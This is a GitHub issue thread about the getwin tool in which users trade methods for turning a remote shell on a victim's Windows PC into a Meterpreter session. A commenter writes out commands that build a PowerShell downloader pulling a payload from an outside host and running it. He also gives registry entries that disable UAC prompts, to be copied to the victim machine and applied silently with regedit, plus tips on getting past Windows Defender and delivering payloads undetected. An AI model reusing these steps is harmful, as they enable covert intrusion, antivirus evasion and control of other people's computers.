### ISSUE TITLE
shell to meterpreter?

### ISSUE THREAD

**Issue by dsx12** [thelinuxchoice/getwin#3]
Any good method for escalating this programs shell to meterpreter shell? thanks..

*This is not a issue just a question*

**Comment by usama7628674** [comment]
@dsx12 There are many methods.
**Step 1**
After gaining shell you've to download a payload so you've to write a small script in powershell extension.
`echo $client = new-object System.Net.WebClient > download.ps1`   ##You can change filename but extesnion should be .ps1
`echo $client.DownloadFile("http://www.xyz.net/download.ps1","C:\tmp\file.txt") >> download.ps1` ##Change http://www.xyz.net to your custom link.You can use serveo or ngrok to host your payload.
Execute both commands in cmd shell.

**Step 2**
Then execute the following command
`Get-Content .download.ps1 | PowerShell.exe -noprofile -`
Navigate to C:\tmp to check your .exe payload
Start your meterpreter handler
Then just execute the .exe file downloaded in C:\tmp\
You'll get meterpreter session easily.

**Comment by dsx12** [comment]
@usama7628674 Does this method bypass windows AV? because if not the programs payload would have to be ran as administrator to have the correct privileges to turn off windows defender and firewall in powershell to run the payloads, unless there is another way? :)

**Comment by dsx12** [comment]
I found another method to basically do what you asked, but afterwards (using windows/meterpreter/reverse_tcp) once running the payload exe I wasn't able to bypass windows defender/AV.

**Comment by dsx12** [comment]
What about other post exploitation toolkit alternatives to metasploit?

**Comment by dsx12** [comment]
Do you have a method for delivering the getwin payload over WAN without detection? or any payload for that matter.

**Comment by usama7628674** [comment]
@dsx12 Yes I've a lot of methods to bypass but you have to try with `windows/meterpreter/reverse_https`.Since https is encrypted so often most tools bypass defender.I know a trick to run payload bypassing uac.You've to edit the registry.
```
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=dword:00000000
"ConsentPromptBehaviorUser"=dword:00000000

```

Copy the above line,paste it in text document then save as `.reg` file.Transfer to victim pc.This will disable 
UAC prompt and you can run your payload as admin.Be sure your payload has manifest file and compiled as `requireadministrator`.

I can't explain everything here.E-mail me and I'll answer your questions.

**Comment by dsx12** [comment]
Certainly bro what is your email?

**Comment by usama7628674** [comment]
@dsx12 usama123456789@protonmail.com
Just email your question.

**Comment by dsx12** [comment]
Email sent.

**Comment by dsx12** [comment]
There is also an issue with editing the registry, when I run with cmd shell it will prompts the user asking for authentication. Is there a way to effectively run the file bypassing authentication from the user?

**Comment by usama7628674** [comment]
@dsx12 `regedit.exe /s nameoffile.reg`.This will add reg file to registry silently.
